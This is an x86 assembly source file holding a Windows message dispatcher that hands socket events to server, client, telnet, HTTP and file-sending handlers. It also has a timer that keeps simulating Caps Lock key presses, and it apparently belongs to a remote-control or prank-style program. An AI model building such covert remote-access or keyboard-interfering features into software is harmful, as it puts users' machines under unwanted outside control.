.386P
.Model Flat ,StdCall

INCLUDE	defines.inc

extrn	DefWindowProcA	: PROC
extrn	PostQuitMessage	: PROC
extrn	WSACleanup	: PROC
extrn	SetTimer	: PROC
extrn	KillTimer	: PROC

extrn	PressKeyBoard	: PROC
extrn	Msg_ServerProc	: PROC
extrn	Msg_ClientProc	: PROC
extrn	Msg_TelnetProc	: PROC
extrn	Msg_HttpProc	: PROC
extrn	Msg_SendFileProc: PROC

.Code

PUBLIC	WndProc
WndProc          proc uses ebx edi esi, hwnd:DWORD, wmsg:DWORD, wParam:DWORD, lParam:DWORD
	mov	eax, wmsg
	cmp	eax, WM_CLOSE
	je	@@WM_CLOSE

	cmp	eax, WM_TIMER
	je	@@MSG_TIMER

	cmp	eax, MSG_SOCKET_BIND
	je	@@MSG_SERVER

	sub	eax, MSG_SOCKET_CLI
	cmp	eax, MAX_CLIENT
	jb	@@MSG_CLIENT

	mov	eax, wmsg
	sub	eax, MSG_TELNET
	cmp	eax, MAX_CLIENT
	jb	@@MSG_TELNET

	mov	eax, wmsg
	sub	eax, MSG_HTTP
	cmp	eax, MAX_HTTP
	jb	@@MSG_HTTP

	mov	eax, wmsg
	sub	eax, MSG_SENDFILE
	cmp	eax, MAX_SENDFILE
	jb	@@MSG_SENDFILE

@@defwndproc:
	call	DefWindowProcA, hwnd, wmsg, wParam, lParam
	ret
@@WM_CLOSE:
	call	WSACleanup
	call	PostQuitMessage, 0
@@WndProcReturn:
	mov	eax, 0FFFFFFFFh
	ret

@@MSG_SERVER:
	call	Msg_ServerProc, hwnd, wmsg, wParam, lParam
	jmp	@@WndProcReturn

@@MSG_CLIENT:
	call	Msg_ClientProc, hwnd, wmsg, wParam, lParam
	jmp	@@WndProcReturn

@@MSG_TELNET:
	call	Msg_TelnetProc, hwnd, wmsg, wParam, lParam
	jmp	@@WndProcReturn

@@MSG_HTTP:
	call	Msg_HttpProc, hwnd, wmsg, wParam, lParam
	jmp	@@WndProcReturn

@@MSG_SENDFILE:
	call	Msg_SendFileProc, hwnd, wmsg, wParam, lParam
	jmp	@@WndProcReturn

@@MSG_TIMER:
	call	KillTimer, hwnd, wParam
	cmp	wParam, TIMER_PLAYKEYB
	jne	@@WndProcReturn

	mov	eax, VK_CAPITAL
	call	PressKeyBoard
	call	SetTimer, hwnd, wParam, 200, 0
	jmp	@@WndProcReturn
WndProc          endp

END